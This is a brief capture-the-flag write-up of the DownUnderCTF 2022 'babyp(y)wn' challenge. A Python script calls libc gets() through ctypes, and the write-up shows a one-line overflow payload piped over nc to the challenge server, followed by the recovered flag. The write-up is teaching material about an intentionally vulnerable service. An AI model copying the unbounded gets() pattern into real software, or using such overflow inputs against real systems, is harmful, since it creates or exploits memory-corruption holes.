babyp(y)wn
Description
Python is memory safe, right?
Steps
in this challenge, we are provided with a python script that imports libc’s lib.so.6 and sets buffers to 512 then calls the gets function and sets the value to buf1
1
2
3
4
5
6
7
8
9
#!/usr/bin/env python3
from ctypes import CDLL, c_buffer
libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
buf1 = c_buffer(512)
buf2 = c_buffer(512)
libc.gets(buf1)
if b'DUCTF' in bytes(buf2):
print(open('./flag.txt', 'r').read())
the vulnerability here is that the gets function takes input until it receives a line terminator with that we can overflow the input into buf2 and pass the check at line 8 to get the flag
Solution
1
python -c "print('a'*512+'DUCTF')" | nc 2022.ductf.dev 30021
Flag
DUCTF{C_is_n0t_s0_f0r31gn_f0r_incr3d1bl3_pwn3rs}
This post is licensed under CC BY 4.0 by the author.